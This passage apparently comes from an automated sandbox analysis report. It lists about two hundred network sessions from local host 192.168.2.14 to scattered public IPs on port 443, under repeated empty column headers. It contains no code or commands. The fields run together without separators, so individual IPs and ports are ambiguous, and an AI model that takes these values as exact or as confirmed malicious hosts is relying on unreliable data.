                                                        11607192.168.2.1460124164.17.101.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11608192.168.2.143364461.217.184.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11609192.168.2.144977623.11.240.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11610192.168.2.145535258.168.100.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11611192.168.2.143436012.23.250.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11612192.168.2.1441692169.53.175.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11613192.168.2.1434322170.249.221.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11614192.168.2.1440094175.103.138.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11615192.168.2.1459448170.98.198.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11616192.168.2.1452090179.98.251.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11617192.168.2.1441890150.150.254.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11618192.168.2.1440072187.123.85.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11619192.168.2.1434242126.15.222.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11620192.168.2.143642661.37.111.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11621192.168.2.1437102139.61.111.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11622192.168.2.1434294203.166.134.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11623192.168.2.1452184143.123.102.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11624192.168.2.1452194172.14.228.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11625192.168.2.1437658146.30.120.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11626192.168.2.144693244.114.189.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11627192.168.2.1454306134.81.178.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11628192.168.2.145198683.53.126.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11629192.168.2.1452250177.247.212.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11630192.168.2.1434094188.158.9.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11631192.168.2.143851413.60.52.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11632192.168.2.145902068.209.59.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11633192.168.2.14591005.53.28.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11634192.168.2.1435872139.150.210.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11635192.168.2.1449598193.151.23.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11636192.168.2.1449044111.42.170.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11637192.168.2.1434408201.181.71.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11638192.168.2.1444120158.13.113.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11639192.168.2.1444518178.71.36.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11640192.168.2.1441618125.160.82.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11641192.168.2.1448776102.19.38.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11642192.168.2.144963436.207.178.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11643192.168.2.145516419.66.39.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11644192.168.2.1456512125.52.233.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11645192.168.2.1448162155.231.25.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11646192.168.2.1435202145.107.168.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11647192.168.2.143910284.148.158.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11648192.168.2.1434792122.134.162.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11649192.168.2.144761251.89.78.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11650192.168.2.1456564147.29.215.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11651192.168.2.1449120122.122.52.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11652192.168.2.144722627.112.60.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11653192.168.2.1439460183.77.15.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11654192.168.2.1448140154.221.223.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11655192.168.2.1438792164.108.98.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11656192.168.2.143408671.1.84.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11657192.168.2.1438690176.170.21.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11658192.168.2.143685247.238.182.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11659192.168.2.1456804137.219.217.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11660192.168.2.145427640.150.90.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11661192.168.2.144111418.150.131.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11662192.168.2.1443500183.54.133.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11663192.168.2.1445852172.126.212.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11664192.168.2.145490072.141.12.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11665192.168.2.144485034.179.32.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11666192.168.2.143623454.101.121.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11667192.168.2.1456598174.1.241.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11668192.168.2.1438294204.248.34.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11669192.168.2.1458442205.204.60.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11670192.168.2.145618618.195.31.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11671192.168.2.1444798143.26.50.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11672192.168.2.145172294.217.120.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11673192.168.2.145811412.72.172.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11674192.168.2.1436312211.4.196.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11675192.168.2.1440052116.231.159.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11676192.168.2.1438376199.173.31.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11677192.168.2.1454954207.49.33.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11678192.168.2.143795460.238.229.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11679192.168.2.145907079.121.141.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11680192.168.2.1433594193.60.124.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11681192.168.2.145788646.176.115.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11682192.168.2.1447866125.192.118.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11683192.168.2.146013487.83.33.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11684192.168.2.1458566218.156.21.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11685192.168.2.1444230118.48.55.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11686192.168.2.144674823.32.173.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11687192.168.2.1458786117.147.92.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11688192.168.2.145127214.159.19.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11689192.168.2.1448478123.65.165.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11690192.168.2.1438058164.252.172.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11691192.168.2.143765875.242.241.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11692192.168.2.1454430198.240.106.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11693192.168.2.145758232.254.66.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11694192.168.2.1458642143.17.144.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11695192.168.2.1443512196.87.115.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11696192.168.2.145865272.107.145.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11697192.168.2.1460044122.245.157.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11698192.168.2.144745076.35.86.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11699192.168.2.144999290.141.237.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11700192.168.2.143446638.181.62.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11701192.168.2.1450490186.153.247.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11702192.168.2.145597212.132.86.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11703192.168.2.1449206110.21.151.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11704192.168.2.1455832207.237.67.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11705192.168.2.1439100133.174.166.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11706192.168.2.1433458117.76.106.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11707192.168.2.1442578119.225.252.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11708192.168.2.1433122158.130.194.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11709192.168.2.1433662114.255.116.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11710192.168.2.1451872203.49.12.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11711192.168.2.1443786112.157.72.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11712192.168.2.145317225.149.154.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11713192.168.2.1436220201.215.172.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11714192.168.2.1454246194.172.255.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11715192.168.2.1437000123.72.228.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11716192.168.2.1443900193.173.74.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11717192.168.2.145074296.58.115.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11718192.168.2.1437378124.108.11.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11719192.168.2.1457428171.254.104.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11720192.168.2.14333569.101.102.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11721192.168.2.144457448.133.155.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11722192.168.2.1457726110.80.68.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11723192.168.2.1434458154.86.157.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11724192.168.2.1438236219.215.157.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11725192.168.2.1459280111.8.222.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11726192.168.2.1442306139.191.170.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11727192.168.2.1457176109.129.148.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11728192.168.2.144890083.218.124.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11729192.168.2.1438572173.0.217.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11730192.168.2.144427865.249.116.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11731192.168.2.1456344176.2.26.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11732192.168.2.1454642206.21.112.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11733192.168.2.145305260.215.68.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11734192.168.2.1451038126.114.1.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11735192.168.2.144593025.2.207.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11736192.168.2.145394057.146.248.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11737192.168.2.144860841.106.103.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11738192.168.2.143647859.247.112.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11739192.168.2.1437354205.107.158.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11740192.168.2.1442122136.142.102.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11741192.168.2.143401057.49.9.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11742192.168.2.1433208172.106.152.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11743192.168.2.1446736199.144.55.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11744192.168.2.1437550101.182.21.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11745192.168.2.146083847.94.197.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11746192.168.2.1442166169.252.156.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11747192.168.2.143994676.254.67.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11748192.168.2.1454584143.41.152.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11749192.168.2.145093459.24.209.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11750192.168.2.14330942.168.196.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11751192.168.2.1454892211.18.168.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11752192.168.2.144167079.129.237.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11753192.168.2.145612095.45.239.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11754192.168.2.143922838.146.158.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11755192.168.2.143819846.140.228.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11756192.168.2.144732673.179.20.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11757192.168.2.145482485.252.1.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11758192.168.2.1435008198.23.179.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11759192.168.2.1435702199.135.75.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11760192.168.2.1440882193.163.143.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11761192.168.2.1446866191.44.128.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11762192.168.2.144216865.217.53.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11763192.168.2.1434488150.188.62.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11764192.168.2.145188431.115.209.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11765192.168.2.145216251.182.122.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11766192.168.2.1434416198.237.162.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11767192.168.2.145152062.139.163.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11768192.168.2.145136262.146.178.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11769192.168.2.1447956162.102.17.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11770192.168.2.144831454.42.168.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11771192.168.2.143760654.99.41.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11772192.168.2.1439580195.228.226.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11773192.168.2.1440466116.119.235.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11774192.168.2.1433598211.144.230.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11775192.168.2.1448566121.189.97.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11776192.168.2.144628634.95.18.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11777192.168.2.145535246.50.20.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11778192.168.2.1453790113.24.131.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11779192.168.2.14498622.228.69.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11780192.168.2.145256046.23.177.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11781192.168.2.145227493.218.206.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11782192.168.2.146072073.202.143.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11783192.168.2.1452894155.151.7.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11784192.168.2.1445748134.234.209.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11785192.168.2.14586465.239.253.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11786192.168.2.1437882153.208.73.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11787192.168.2.1446930173.215.176.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11788192.168.2.143863423.194.1.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11789192.168.2.143418291.8.189.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11790192.168.2.14586524.59.253.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11791192.168.2.145725850.39.213.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11792192.168.2.1458742135.209.49.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11793192.168.2.1434416191.203.126.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11794192.168.2.1434882130.140.31.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11795192.168.2.1452662161.225.205.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11796192.168.2.145574217.105.142.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11797192.168.2.1458648216.62.112.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11798192.168.2.145569848.106.193.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11799192.168.2.1454970219.159.235.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11800192.168.2.1460202123.233.13.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11801192.168.2.144906846.174.97.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11802192.168.2.1432938221.153.75.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11803192.168.2.1458620143.117.213.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11804192.168.2.1439888149.23.151.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11805192.168.2.145309667.177.224.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11806192.168.2.144313081.245.139.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11807192.168.2.1435924202.84.229.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11808192.168.2.1457530151.27.226.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11809192.168.2.145970632.88.156.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11810192.168.2.145848699.157.6.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11811192.168.2.1454376114.6.224.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11812192.168.2.1438816167.173.216.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11813192.168.2.144260684.186.161.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11814192.168.2.1454480206.233.48.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11815192.168.2.1449312114.103.145.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11816192.168.2.1439668176.230.186.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11817192.168.2.1437478107.254.180.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11818192.168.2.1443594149.162.112.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11819192.168.2.143354439.105.190.80443
